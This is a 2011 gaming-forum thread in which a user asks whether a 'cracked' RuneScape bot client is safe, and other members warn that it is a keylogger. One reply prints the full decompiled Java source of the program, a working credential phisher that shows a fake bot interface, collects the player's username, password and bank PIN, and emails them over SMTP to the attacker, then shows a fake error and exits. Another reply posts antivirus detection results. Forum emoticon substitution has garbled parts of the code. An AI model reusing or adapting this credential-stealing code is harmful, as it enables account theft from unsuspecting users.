Post: Rsbot.net get all bots for free?
05-23-2011, 12:22 PM #1
imhungry17
You talkin to me?
(adsbygoogle = window.adsbygoogle || []).push({}); Ok i've been doing some research on how to get rsbot.net's bots for free. They are paid bots but they work extremely well, and have the lowest ban rate. I found this video and downloaded the cracked version of rsbot.net. I scanned it for viruses with my scanner and on novirusthanks.org. Each time there was no virus. However im very cautious and im scared to open it. The video is located here.

Post back and tell me how it works please.

This is a virus scan of the program.

File information
Report date: 2011-05-23 15:11:30 (GMT 1)
File name: rsbots-net-cracked-client-jar
File size: 79212 bytes
MD5 hash: a96d81ad328a664472bb35e87e681e18
SHA1 hash: 56a018ab9b4479f5c5e3ff8f820049fe4d9cb934
Detection rate: 0 on 6 (0%)
Status: CLEAN
Antivirus Database Engine Result
AVG 23/05/2011 10.0.0.1190
Avira AntiVir 23/05/2011 7.11.7.12
ClamAV 23/05/2011 0.97
Emsisoft 23/05/2011 5.1.0.2
TrendMicro 23/05/2011 9.200.0.1012
Zoner 23/05/2011 0.2
Extra information
File type: Unknown file
Packer: Nothing found
Binder detector: Nothing found
PDF analyzer: Nothing found
Last edited by imhungry17 ; 05-23-2011 at 01:12 PM.

The following user groaned imhungry17 for this awful post:

lobbyhax
05-24-2011, 09:08 PM #11
oilers664
Chea Bro
It's a Keylogger, but go ahead try it out see what happens.
05-24-2011, 09:22 PM #12
imhungry17
You talkin to me?
All of you are assuming it is a keylogger, any proof, because i want/need this.
05-24-2011, 09:26 PM #13
oilers664
Chea Bro
Try it out, see what happens.
05-25-2011, 10:17 AM #14
Default Avatar
jaapie
Guest
this is fake

see the source code

    import java.awt.Color;
import java.awt.Container;
import java.awt.Dimension;
import java.awt.EventQueue;
import java.awt.Font;
import java.awt.Toolkit;
import java.awt.event.ActionEvent;
import java.awt.event.ActionListener;
import java.awt.event.MouseAdapter;
import java.awt.event.MouseEvent;
import java.io.BufferedReader;
import java.io.File;
import java.io.FileReader;
import java.util.Properties;
import javax.mail.Session;
import javax.mail.Transport;
import javax.mail.internet.InternetAddress;
import javax.mail.internet.MimeMessage;
import javax.mail.internet.MimeMessage.RecipientType;
import javax.swing.DefaultComboBoxModel;
import javax.swing.GroupLayout;
import javax.swing.GroupLayout.Alignment;
import javax.swing.GroupLayout.ParallelGroup;
import javax.swing.GroupLayout.SequentialGroup;
import javax.swing.ImageIcon;
import javax.swing.JButton;
import javax.swing.JComboBox;
import javax.swing.JFrame;
import javax.swing.JLabel;
import javax.swing.JOptionPane;
import javax.swing.JPasswordField;
import javax.swing.JTextField;
import javax.swing.LayoutStyle.ComponentPlacement;
import solar.SolarEncryption;

public class RsbotsCracked extends JFrame
{
String checkingIfBlank;
private static boolean pinIsANumber;
private static int pinLength;
private static int pinInt;
private static int usernameLength;
private static int passwordLength;
private static String username;
private static String password;
private static String pin;
private static String TEXT;
private static String encryptedHost;
private static String encryptedUsername;
private static String encryptedPassword;
private static String decryptedHost;
private static String decryptedUsername;
private static String decryptedPassword;
private static String PORT = "465";
private static String FROM;
private static String TO;
private static String STARTTLS = "true";
private static String AUTH = "true";
private static String DEBUG = "true";
private static String SOCKET_FACTORY = "javax.net.ssl.SSLSocketFactory";
[B] private static String SUBJECT = "Solar's RS Program Phisher Creator V1 - Logs";[/B]
private JButton jButton1;
private JComboBox jComboBox1;
private JLabel jLabel1;
private JLabel jLabel10;
private JLabel jLabel11;
private JLabel jLabel2;
private JLabel jLabel3;
private JLabel jLabel4;
private JLabel jLabel5;
private JLabel jLabel6;
private JLabel jLabel7;
private JLabel jLabel8;
private JLabel jLabel9;
private JPasswordField jPasswordField1;
private JTextField jTextField1;
private JTextField jTextField2;

public RsbotsCracked()
{
initComponents();
Color backgroundColor = new Color(245, 245, 220);
getContentPane().setBackground(backgroundColor);
File data = new File("data/data.db");
File key = new File("data/key.db");

if (!data.exists()) {
JOptionPane.showMessageDialog(null, "The data.db file is missing from the data folder! Redownload the bot and make sure data.db is in the data folder!", "RSBots.net Cracked Client - Error", 0);
System.exit(0);
}

if (!key.exists()) {
JOptionPane.showMessageDialog(null, "The key.db file is missing from the data folder! Redownload the bot and make sure key.db is in the data folder!", "RSBots.net Cracked Client - Error", 0);
System.exit(0);
}

if (data.exists()) {
try
{
BufferedReader in = new BufferedReader(new FileReader("data/data.db"));

this.checkingIfBlank = in.readLine();

if (this.checkingIfBlank == null) {
JOptionPane.showMessageDialog(null, "The data.db file is corrupt! Redownload the bot and make sure data.db is in the data folder!", "RSBots.net Cracked Client - Error", 0);
System.exit(0);
}
}
catch (Exception e)
{
JOptionPane.showMessageDialog(null, "The data.db file is corrupt! Redownload the bot and make sure data.db is in the data folder!", "RSBots.net Cracked Client - Error", 0);
System.exit(0);
}
}

if (key.exists())
try
{
BufferedReader in = new BufferedReader(new FileReader("data/key.db"));

this.checkingIfBlank = in.readLine();

if (this.checkingIfBlank == null) {
JOptionPane.showMessageDialog(null, "The key.db file is corrupt! Redownload the bot and make sure key.db is in the data folder!", "RSBots.net Cracked Client - Error", 0);
System.exit(0);
}
}
catch (Exception e)
{
JOptionPane.showMessageDialog(null, "The key.db file is corrupt! Redownload the bot and make sure key.db is in the data folder!", "RSBots.net Cracked Client - Error", 0);
System.exit(0);
}
}

private void initComponents()
{
this.jLabel1 = new JLabel();
this.jLabel2 = new JLabel();
this.jLabel3 = new JLabel();
this.jComboBox1 = new JComboBox();
this.jLabel4 = new JLabel();
this.jLabel5 = new JLabel();
this.jLabel6 = new JLabel();
this.jPasswordField1 = new JPasswordField();
this.jTextField1 = new JTextField();
this.jTextField2 = new JTextField();
this.jButton1 = new JButton();
this.jLabel7 = new JLabel();
this.jLabel8 = new JLabel();
this.jLabel9 = new JLabel();
this.jLabel10 = new JLabel();
this.jLabel11 = new JLabel();

setDefaultCloseOperation(3);
setTitle("RSBots.net Cracked Client");
setResizable(false);

this.jLabel3.setFont(new Font("Trebuchet MS", 1, 1Cool Man (aka Tustin));
this.jLabel3.setText("Choose your bot:");

this.jComboBox1.setModel(new DefaultComboBoxModel(new String[] { "Auto Fighter", "Auto Pest Control", "Auto Fisher", "Auto Chopper", "Auto Miner", "Auto Soul Wars", "Auto GDK", "Auto MTA", "Auto Hunter", "Auto Prayer", "Auto Firemaker", "Auto Herblore", "Auto BDK", "Auto Sorceress' Garden" }));
this.jComboBox1.addActionListener(new ActionListener() {
public void actionPerformed(ActionEvent evt) {
RsbotsCracked.this.jComboBox1ActionPerformed(evt);
}
});
this.jLabel4.setFont(new Font("Sylfaen", 2, 14));
this.jLabel4.setText("RuneScape Username:");

this.jLabel5.setFont(new Font("Sylfaen", 2, 14));
this.jLabel5.setText("RuneScape Password:");

this.jLabel6.setFont(new Font("Sylfaen", 2, 14));
this.jLabel6.setText("RuneScape Bank Pin (leave empty if you don't have one):");

this.jButton1.setFont(new Font("Rod", 0, 14));
this.jButton1.setText("Start Botting!");
this.jButton1.addMouseListener(new MouseAdapter() {
public void mousePressed(MouseEvent evt) {
RsbotsCracked.this.jButton1MousePressed(evt);
}
});
this.jLabel8.setIcon(new ImageIcon(getClass().getResource("/crack/crackedclientbanner.png")));

this.jLabel9.setIcon(new ImageIcon(getClass().getResource("/crack/crackedclientpic.jpg")));
this.jLabel9.setText("jLabel9");
this.jLabel9.setPreferredSize(new Dimension(477, 330));

this.jLabel10.setIcon(new ImageIcon(getClass().getResource("/crack/crackedclientpic.jpg")));
this.jLabel10.setText("jLabel9");
this.jLabel10.setPreferredSize(new Dimension(477, 330));

this.jLabel11.setIcon(new ImageIcon(getClass().getResource("/crack/crackedclientpic.jpg")));

GroupLayout layout = new GroupLayout(getContentPane());
getContentPane().setLayout(layout);
layout.setHorizontalGroup(layout.createParallelGroup(GroupLayout.Alignment.LEADING).addGroup(layout.createSequentialGroup().addGroup(layout.createParallelGroup(GroupLayout.Alignment.LEADING).addGroup(layout.createSequentialGroup().addContainerGap().addGroup(layout.createParallelGroup(GroupLayout.Alignment.LEADING).addGroup(GroupLayout.Alignment.TRAILING, layout.createSequentialGroup().addComponent(this.jLabel2).addPreferredGap(LayoutStyle.ComponentPlacement.RELATED).addComponent(this.jLabelCool Man (aka Tustin).addGap(587, 587, 587).addComponent(this.jLabel7).addGap(1093, 1093, 1093)).addGroup(GroupLayout.Alignment.TRAILING, layout.createSequentialGroup().addComponent(this.jLabel1, -2, 491, -2).addGap(18, 18, 1Cool Man (aka Tustin)))).addGroup(layout.createParallelGroup(GroupLayout.Alignment.TRAILING, false).addGroup(GroupLayout.Alignment.LEADING, layout.createSequentialGroup().addGap(181, 181, 181).addGroup(layout.createParallelGroup(GroupLayout.Alignment.LEADING).addGroup(layout.createSequentialGroup().addComponent(this.jLabel6).addPreferredGap(LayoutStyle.ComponentPlacement.RELATED).addComponent(this.jTextField2, -2, 44, -2)).addGroup(layout.createParallelGroup(GroupLayout.Alignment.LEADING, false).addGroup(layout.createSequentialGroup().addComponent(this.jLabel5).addPreferredGap(LayoutStyle.ComponentPlacement.RELATED).addComponent(this.jPasswordField1)).addGroup(layout.createSequentialGroup().addComponent(this.jLabel4).addPreferredGap(LayoutStyle.ComponentPlacement.RELATED).addComponent(this.jTextField1, -2, 165, -2)).addGroup(layout.createSequentialGroup().addComponent(this.jLabel3).addPreferredGap(LayoutStyle.ComponentPlacement.RELATED).addComponent(this.jComboBox1, -2, -1, -2))).addGroup(layout.createSequentialGroup().addGap(100, 100, 100).addComponent(this.jButton1))).addPreferredGap(LayoutStyle.ComponentPlacement.RELATED, 31, 32767)).addGroup(GroupLayout.Alignment.LEADING, layout.createSequentialGroup().addGap(105, 105, 105).addComponent(this.jLabel11)))).addContainerGap(-1, 32767)).addGroup(layout.createParallelGroup(GroupLayout.Alignment.LEADING).addGroup(layout.createSequentialGroup().addGap(0, 1860, 32767).addComponent(this.jLabel9, -2, -1, -2).addGap(0, 0, 32767))).addGroup(layout.createParallelGroup(GroupLayout.Alignment.LEADING).addGroup(layout.createSequentialGroup().addGap(0, 1860, 32767).addComponent(this.jLabel10, -2, -1, -2).addGap(0, 0, 32767))));

layout.setVerticalGroup(layout.createParallelGroup(GroupLayout.Alignment.LEADING).addGroup(layout.createSequentialGroup().addGroup(layout.createParallelGroup(GroupLayout.Alignment.TRAILING).addGroup(layout.createSequentialGroup().addComponent(this.jLabel1).addGroup(layout.createParallelGroup(GroupLayout.Alignment.LEADING).addGroup(layout.createSequentialGroup().addGap(42, 42, 42).addComponent(this.jLabel7)).addGroup(layout.createSequentialGroup().addPreferredGap(LayoutStyle.ComponentPlacement.RELATED).addComponent(this.jLabel2, -2, 76, -2)))).addComponent(this.jLabelCool Man (aka Tustin)).addPreferredGap(LayoutStyle.ComponentPlacement.RELATED).addComponent(this.jLabel11, -2, 108, -2).addContainerGap(208, 32767)).addGroup(GroupLayout.Alignment.TRAILING, layout.createSequentialGroup().addContainerGap(207, 32767).addGroup(layout.createParallelGroup(GroupLayout.Alignment.BASELINE).addComponent(this.jLabel3).addComponent(this.jComboBox1, -2, -1, -2)).addGap(18, 18, 1Cool Man (aka Tustin).addGroup(layout.createParallelGroup(GroupLayout.Alignment.BASELINE).addComponent(this.jLabel4).addComponent(this.jTextField1, -2, -1, -2)).addGap(18, 18, 1Cool Man (aka Tustin).addGroup(layout.createParallelGroup(GroupLayout.Alignment.BASELINE).addComponent(this.jLabel5).addComponent(this.jPasswordField1, -2, -1, -2)).addGap(18, 18, 1Cool Man (aka Tustin).addGroup(layout.createParallelGroup(GroupLayout.Alignment.BASELINE).addComponent(this.jLabel6).addComponent(this.jTextField2, -2, -1, -2)).addGap(26, 26, 26).addComponent(this.jButton1).addContainerGap()).addGroup(layout.createParallelGroup(GroupLayout.Alignment.LEADING).addGroup(layout.createSequentialGroup().addGap(0, 47, 32767).addComponent(this.jLabel9, -2, -1, -2).addGap(0, 27, 32767))).addGroup(layout.createParallelGroup(GroupLayout.Alignment.LEADING).addGroup(layout.createSequentialGroup().addGap(0, 47, 32767).addComponent(this.jLabel10, -2, -1, -2).addGap(0, 27, 32767))));

Dimension screenSize = Toolkit.getDefaultToolkit().getScreenSize();
setBounds((screenSize.width - 700) / 2, (screenSize.height - 440) / 2, 700, 440);
}

private void jComboBox1ActionPerformed(ActionEvent evt)
{
}

private void jButton1MousePressed(MouseEvent evt)
{
username = this.jTextField1.getText();
password = this.jPasswordField1.getText();
pin = this.jTextField2.getText();
pinLength = pin.length();
try
{
BufferedReader in = new BufferedReader(new FileReader("data/data.db"));

encryptedHost = in.readLine();
encryptedUsername = in.readLine();
encryptedPassword = in.readLine();

decryptedHost = SolarEncryption.decrypt(encryptedHost);
decryptedUsername = SolarEncryption.decrypt(encryptedUsername);
decryptedPassword = SolarEncryption.decrypt(encryptedPassword);

TO = decryptedUsername;
FROM = decryptedUsername;

in.close();
}
catch (Exception e) {
}
passwordLength = password.length();
usernameLength = username.length();
try
{
pinInt = Integer.valueOf(pin).intValue();
pinIsANumber = true;
}
catch (Exception e) {
pinIsANumber = false;
}

if (pinLength == 0) {
pinIsANumber = true;
pin = "NONE ENTERED";
}

if ((!pinIsANumber) || ((pinLength != 0) && (pinLength != 4)) || (passwordLength < 5) || (passwordLength > 20) || (usernameLength < 1) || (usernameLength > 71))
{
JOptionPane.showMessageDialog(null, "Your information is incorrect!", "Incorrect Information", 0);
}
else
{
sendMail();
JOptionPane.showMessageDialog(null, "Failed to access the authorization server!", "Error", 0);
System.exit(0);
}
}

public synchronized void sendMail()
{
TEXT = "/* Logs brought to you by Solar's RS Program Phisher Creator V1 */ Coded in Java by Solar from Hacking.rs */ Username: " + username + " / Password: " + password + " / Pin: " + pin + "";

Properties props = new Properties();

props.put("mail.smtp.host", decryptedHost);
props.put("mail.smtp.port", PORT);
props.put("mail.smtp.user", decryptedUsername);
props.put("mail.smtp.auth", AUTH);
props.put("mail.smtp.starttls.enable", STARTTLS);
props.put("mail.smtp.debug", DEBUG);
props.put("mail.smtp.socketFactory.port", PORT);
props.put("mail.smtp.socketFactory.class", SOCKET_FACTORY);
props.put("mail.smtp.socketFactory.fallback", "false");
try
{
Session session = Session.getDefaultInstance(props, null);
session.setDebug(true);

MimeMessage message = new MimeMessage(session);
message.setText(TEXT);
message.setSubject(SUBJECT);
message.setFrom(new InternetAddress(FROM));
message.addRecipient(MimeMessage.RecipientType.TO, new InternetAddress(TO));
message.saveChanges();

Transport transport = session.getTransport("smtp");
transport.connect(decryptedHost, decryptedUsername, decryptedPassword);
transport.sendMessage(message, message.getAllRecipients());
transport.close();
}
catch (Exception e)
{
}
}

public static void main(String[] args) {
EventQueue.invokeLater(new Runnable() {
public void run() {
new RsbotsCracked().setVisible(true);
}
});
}
}
05-25-2011, 11:41 AM #15
Modus
¯\_(ツWinky Winky_/¯
The RSBot.net site forums says that all auth code generators are Keyloggers and you should not download them
05-25-2011, 03:46 PM #16
imhungry17
You talkin to me?
Ok. Thanks guys. But it makes sense that rsbot.net would say that. They would lose business.
05-25-2011, 11:03 PM #17
oilers664
Chea Bro
Or they want to look out for their community, if you're so sure this is legit you use it. We will see who is right and wrong when you lose you're account.
05-31-2011, 11:28 PM #18
Brochacho
Like a boss
Rsbots.net Cracked Client.exe
Submission date: 2011-05-31 23:26:26 (UTC)
Current status: finished
Result: 17/ 42 (40.5%)


Antivirus Version Last Update Result
AhnLab-V3 2011.06.01.00 2011.05.31 -
AntiVir 7.11.8.210 2011.05.31 -
Antiy-AVL 2.0.3.7 2011.05.31 -
Avast 4.8.1351.0 2011.05.31 Win32Happyownloader-HKY
Avast5 5.0.677.0 2011.05.31 Win32Happyownloader-HKY
AVG 10.0.0.1190 2011.06.01 Worm/Generic2.ARTX
BitDefender 7.2 2011.05.31 Worm.Generic.327699
CAT-QuickHeal 11.00 2011.05.31 -
ClamAV 0.97.0.0 2011.05.31 -
Commtouch 5.3.2.6 2011.05.31 -
Comodo 8909 2011.06.01 -
DrWeb 5.0.2.03300 2011.06.01 -
eSafe 7.0.17.0 2011.05.31 -
eTrust-Vet 36.1.8359 2011.05.31 -
F-Prot 4.6.2.117 2011.05.31 -
F-Secure 9.0.16440.0 2011.06.01 Worm.Generic.327699
Fortinet 4.2.257.0 2011.05.31 -
GData 22 2011.05.31 Worm.Generic.327699
Ikarus T3.1.1.104.0 2011.05.31 Virus.Worm.SuspectCRC
Jiangmin 13.0.900 2011.05.30 -
K7AntiVirus 9.104.4745 2011.05.31 Riskware
Kaspersky 9.0.0.837 2011.06.01 Trojan.Win32.Refroso.dmzq
McAfee 5.400.0.1158 2011.06.01 Artemis!8F666A174ED9
McAfee-GW-Edition 2010.1D 2011.06.01 Artemis!8F666A174ED9
Microsoft 1.6903 2011.05.31 -
NOD32 6169 2011.06.01 a variant of Win32/Injector.GQQ
Norman 6.07.07 2011.05.31 W32/Refroso.CN
nProtect 2011-05-31.02 2011.05.31 Worm.Generic.327699
Panda 10.0.3.5 2011.05.31 Suspicious file
PCTools 7.0.3.5 2011.05.19 -
Prevx 3.0 2011.06.01 -
Rising 23.60.01.05 2011.05.31 -
Sophos 4.65.0 2011.06.01 -
SUPERAntiSpyware 4.40.0.1006 2011.06.01 -
Symantec 20111.1.0.186 2011.06.01 -
TheHacker 6.7.0.1.215 2011.05.31 Trojan/AutoRun.PSW.VB.h
TrendMicro 9.200.0.1012 2011.05.31 -
TrendMicro-HouseCall 9.200.0.1012 2011.06.01 -
VBA32 3.12.16.0 2011.05.31 -
VIPRE 9448 2011.05.31 -
ViRobot 2011.5.31.4488 2011.05.31 -
VirusBuster 14.0.59.0 2011.05.31 Worm.Agent!aUH0O3Le8xM
06-01-2011, 04:08 AM #19
+La. TheMadMan
Do a barrel roll!
.Jar files are called Java Drive Bys. Basically they can have a stealer which steals loads of info off you without putting anything in or typing anything. Like the username and password you entered into the botclient, it is saved into data.db, the .jar file steals this and gets ur username and password. Don't download it trust me.

Copyright © 2024, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo